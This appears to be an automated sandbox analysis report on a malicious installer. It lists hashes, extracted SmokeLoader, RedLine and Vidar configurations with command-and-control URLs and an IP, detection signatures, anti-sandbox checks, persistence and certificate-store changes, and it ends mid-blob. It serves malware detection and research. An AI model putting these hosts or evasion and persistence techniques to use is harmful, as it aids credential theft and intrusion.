Resubmissions
01-11-2021 20:09
211101-yw5kbaafg5 1001-11-2021 07:13
211101-h2lrdsdhhj 1001-11-2021 06:40
211101-hfpk6adhfj 1031-10-2021 18:27
211031-w3r7fsdafj 1031-10-2021 14:10
211031-rgstmscghm 1031-10-2021 08:02
211031-jxchlacefm 1031-10-2021 06:36
211031-hczxqacddp 1031-10-2021 06:23
211031-g5wv4affb3 10Analysis
-
max time kernel
3109s -
max time network
3112s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
01-11-2021 07:13
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
4.5MB
-
MD5
3da25ccfa9c258e3ae26854391531c7b
-
SHA1
1ed5613b0ad8ab4c47f07e52199a4edd27be40e6
-
SHA256
62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720
-
SHA512
defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c
Malware Config
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
vidar
47.8
869
https://mas.to/@romashkin
-
profile_id
869
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/2612-247-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2612-248-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2612-249-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2612-250-0x0000000000418D3E-mapping.dmp family_redline behavioral1/memory/2612-252-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x00050000000132d2-104.dat family_socelars behavioral1/files/0x00050000000132d2-129.dat family_socelars behavioral1/files/0x00050000000132d2-150.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/2516-262-0x0000000003040000-0x000000000311E000-memory.dmp family_vidar behavioral1/memory/2516-263-0x0000000000400000-0x0000000000545000-memory.dmp family_vidar behavioral1/memory/2096-291-0x0000000000240000-0x0000000000283000-memory.dmp family_vidar behavioral1/memory/2432-313-0x0000000000400000-0x0000000002BB8000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x00050000000130d5-70.dat aspack_v212_v242 behavioral1/files/0x00050000000130d5-71.dat aspack_v212_v242 behavioral1/files/0x00060000000126a2-72.dat aspack_v212_v242 behavioral1/files/0x00060000000126a2-73.dat aspack_v212_v242 behavioral1/files/0x000500000001318e-76.dat aspack_v212_v242 behavioral1/files/0x000500000001318e-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 52 IoCs
pid Process 1068 setup_installer.exe 660 setup_install.exe 1716 Sun0397381f1f458e.exe 276 Sun03e4aeb7e43a1c.exe 936 Sun03d477f1a31.exe 1672 Sun0324aba28588c0.exe 1644 Sun039750b00c.exe 1640 Sun033e271e0ce96c08.exe 1700 Sun03f0dc4460bc9.exe 1684 Sun038db98f99bf9a.exe 1208 Sun038aa349e3318e.exe 1488 Sun0397381f1f458e.exe 1704 Sun03ea09aa5c9686e5.exe 1928 Sun0328255c4bce6fb.exe 1788 Sun0351a0558292.exe 1668 Sun03f5d51697d04.exe 980 Sun03f5d51697d04.tmp 1828 Sun03f5d51697d04.exe 2064 Sun03f5d51697d04.tmp 2516 9821690663.exe 2408 Sun03f0dc4460bc9.exe 2648 LzmwAqmV.exe 2612 Sun03f0dc4460bc9.exe 2940 9529786652.exe 3052 Chrome5.exe 2072 DownFlSetup110.exe 2096 inst1.exe 2232 conhost.exe 2432 Soft1WW01.exe 2460 2625014.exe 2412 5.exe 2792 search_hyperfs_206.exe 2256 setup.exe 2832 chenxiulan-game.exe 2868 Calculator Installation.exe 2864 6.exe 1136 1934523.exe 940 kPBhgOaGQk.exe 2652 LzmwAqmV.exe 2460 2625014.exe 2616 2734892.exe 2244 898869.exe 1648 85209.exe 2144 5319657.exe 2972 O0rNF.EXE 1288 WinHoster.exe 2608 services64.exe 1976 sihost64.exe 3060 cttesev 3044 cttesev 1392 cttesev 1180 cttesev -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2625014.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2625014.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2734892.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2734892.exe -
Loads dropped DLL 64 IoCs
pid Process 1672 setup_x86_x64_install.exe 1068 setup_installer.exe 1068 setup_installer.exe 1068 setup_installer.exe 1068 setup_installer.exe 1068 setup_installer.exe 1068 setup_installer.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 660 setup_install.exe 1320 cmd.exe 1320 cmd.exe 1916 cmd.exe 1148 cmd.exe 1148 cmd.exe 576 cmd.exe 1104 cmd.exe 1104 cmd.exe 840 cmd.exe 840 cmd.exe 1716 Sun0397381f1f458e.exe 1716 Sun0397381f1f458e.exe 524 cmd.exe 524 cmd.exe 1400 cmd.exe 1596 cmd.exe 276 Sun03e4aeb7e43a1c.exe 276 Sun03e4aeb7e43a1c.exe 1644 Sun039750b00c.exe 1644 Sun039750b00c.exe 1640 Sun033e271e0ce96c08.exe 1640 Sun033e271e0ce96c08.exe 1672 Sun0324aba28588c0.exe 1672 Sun0324aba28588c0.exe 1700 Sun03f0dc4460bc9.exe 1700 Sun03f0dc4460bc9.exe 1684 Sun038db98f99bf9a.exe 1684 Sun038db98f99bf9a.exe 1208 Sun038aa349e3318e.exe 1208 Sun038aa349e3318e.exe 1716 Sun0397381f1f458e.exe 1476 cmd.exe 1044 cmd.exe 1820 cmd.exe 1488 Sun0397381f1f458e.exe 1488 Sun0397381f1f458e.exe 1772 cmd.exe 1668 Sun03f5d51697d04.exe 1668 Sun03f5d51697d04.exe 936 Sun03d477f1a31.exe 936 Sun03d477f1a31.exe 1668 Sun03f5d51697d04.exe 980 Sun03f5d51697d04.tmp 980 Sun03f5d51697d04.tmp 980 Sun03f5d51697d04.tmp 972 WerFault.exe 972 WerFault.exe 972 WerFault.exe 980 Sun03f5d51697d04.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 85209.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2625014.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2734892.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ip-api.com 65 freegeoip.app 67 freegeoip.app 68 freegeoip.app 70 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2460 2625014.exe 2616 2734892.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1700 set thread context of 2612 1700 Sun03f0dc4460bc9.exe 74 PID 2484 set thread context of 2836 2484 conhost.exe 153 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-S984R.tmp Sun03f5d51697d04.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 972 660 WerFault.exe 29 2904 2432 WerFault.exe 87 2700 2864 WerFault.exe 97 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cttesev -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2900 schtasks.exe -
Kills process with taskkill 6 IoCs
pid Process 2580 taskkill.exe 3012 taskkill.exe 2532 taskkill.exe 2936 taskkill.exe 2520 taskkill.exe 3064 taskkill.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun03e4aeb7e43a1c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd 6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 1934523.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun03d477f1a31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun03d477f1a31.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun03e4aeb7e43a1c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 chenxiulan-game.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd chenxiulan-game.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdc